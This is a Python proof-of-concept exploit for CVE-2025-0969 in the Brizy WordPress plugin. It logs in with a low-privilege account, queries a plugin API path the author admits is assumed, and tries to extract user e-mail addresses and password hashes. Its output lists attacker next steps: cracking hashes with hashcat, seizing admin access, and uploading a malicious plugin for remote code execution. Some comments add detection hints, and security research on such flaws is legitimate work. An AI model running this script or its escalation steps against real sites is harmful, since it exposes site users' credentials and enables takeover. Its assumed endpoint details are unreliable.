# CVE-2025-0969 PoC - Brizy Plugin Sensitive Information Exposure
# Author: Security Researcher
# Target: WordPress with Brizy Plugin <= 2.7.16
import requests
import json
import sys
from urllib.parse import urljoin
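def exploit_brizy_cve_2025_0969(target_url, username, password, timeout=15):
    """
    Probe a WordPress site for CVE-2025-0969 (Brizy Page Builder information disclosure).

    Logs in with a Contributor-or-higher account, then asks the plugin's
    ``get_users`` API for data and inspects the reply for user records.

    Args:
        target_url: Base URL of the WordPress site.
        username: Login name of the Contributor+ account.
        password: Password of that account.
        timeout: Seconds to wait on each HTTP request before giving up.

    Returns:
        The parsed JSON (or the raw body text when the body is not JSON) of the
        first response that matched the heuristics, or ``None`` when login
        failed, a request failed, or nothing matched.

    Notes:
        The match heuristics are loose: a hit means "inspect this response",
        not "exposure confirmed". The returned value and the printed output may
        contain e-mail addresses and password hashes, so handle them as
        sensitive data.
        For detection: the probe shows up in access logs as an authenticated
        low-privilege session requesting the plugin path built below with
        ``brizy_api=get_users``.
    """
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1',
    }

    # Endpoint and parameters the PoC assumes reach the plugin's get_users().
    exploit_url = urljoin(target_url, '/wp-content/plugins/brizy/editor/api.php')
    params = {
        'brizy_api': 'get_users',  # Vulnerable function call
        'hash': '',                # May need valid hash depending on plugin config
        '_ajax_nonce': '',         # May need nonce for some configurations
    }
    headers = {
        'X-Requested-With': 'XMLHttpRequest',
        'Content-Type': 'application/json',
    }

    # The session is closed on exit; every request carries a timeout so an
    # unresponsive host cannot hang the script.
    with requests.Session() as session:
        try:
            # Step 1: log in. Kept inside the try so a connection error here is
            # reported the same way as errors from the later requests.
            print(f'[*] Attempting login to {login_url}')
            session.post(login_url, data=login_data, allow_redirects=True,
                         timeout=timeout)
            cookie_dump = str(session.cookies)
            if ('wordpress_logged_in' not in cookie_dump
                    and 'authenticated' not in cookie_dump):
                print('[-] Login failed. Check credentials.')
                return None
            print('[+] Login successful with contributor account')

            # Step 2: query the endpoint. The original listed three "vectors",
            # but only their HTTP method was ever used and the third repeated
            # the first GET, so the same request is sent once per method.
            print(f'[*] Exploiting vulnerable endpoint: {exploit_url}')
            for method in ('GET', 'POST'):
                if method == 'GET':
                    response = session.get(exploit_url, params=params,
                                           headers=headers, timeout=timeout)
                else:
                    response = session.post(exploit_url, data=params,
                                            headers=headers, timeout=timeout)

                if response.status_code != 200:
                    continue

                try:
                    data = response.json()
                except ValueError:
                    # Body is not JSON: fall back to a plain-text marker search.
                    body = response.text
                    if 'user_email' in body or 'wp_users' in body:
                        print('[+] Sensitive data found in response!')
                        print(f'[+] Response preview: {body[:500]}')
                        return body
                    continue

                # Key lookups only make sense on a JSON object; other JSON
                # types are judged by the stringified 'email' check alone.
                # Any object with a top-level 'data' key matches, so review
                # the content before treating a hit as confirmed exposure.
                has_key = isinstance(data, dict) and ('users' in data or 'data' in data)
                if has_key or 'email' in str(data).lower():
                    print('[+] Potential sensitive data found!')
                    print(f'[+] Response: {json.dumps(data, indent=2)}')
                    return data

            print('[-] No vulnerable response detected. Target may be patched or not vulnerable.')
            return None
        except requests.exceptions.RequestException as e:
            print(f'[-] Request failed: {e}')
            return None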
def main():
    """
    Command-line entry point.

    Expects three positional arguments (target URL, username, password), runs
    the probe and prints a summary. Exits with status 1 when arguments are
    missing.
    """
    if len(sys.argv) < 4:
        print('Usage: python cve_2025_0969_poc.py <target_url> <username> <password>')
        print('Example: python cve_2025_0969_poc.py http://example.com contributor password123')
        sys.exit(1)

    # NOTE(review): credentials given on the command line end up in shell
    # history and are visible in process listings while the script runs.
    target_url, username, password = sys.argv[1:4]

    rule = '=' * 60
    print(rule)
    print('CVE-2025-0969 - Brizy Page Builder Information Disclosure')
    print(rule)

    result = exploit_brizy_cve_2025_0969(target_url, username, password)
    if not result:
        print('\n[-] Exploitation failed or target is not vulnerable')
        return

    # The summary below is static text printed for any truthy result; it is
    # not derived from what the response actually contained.
    summary_lines = (
        '\n[!] Exploitation successful!',
        '[!] Extracted sensitive information includes:',
        ' - Admin email addresses',
        ' - Password hashes (can be cracked offline)',
        '\n[!] Next steps for attacker:',
        ' 1. Crack password hashes using tools like hashcat',
        ' 2. Use cracked credentials to gain admin access',
        ' 3. Upload malicious plugin for RCE',
    )
    for line in summary_lines:
        print(line)
# Run the CLI only when the file is executed as a script, not when imported.
if __name__ == '__main__':
    main()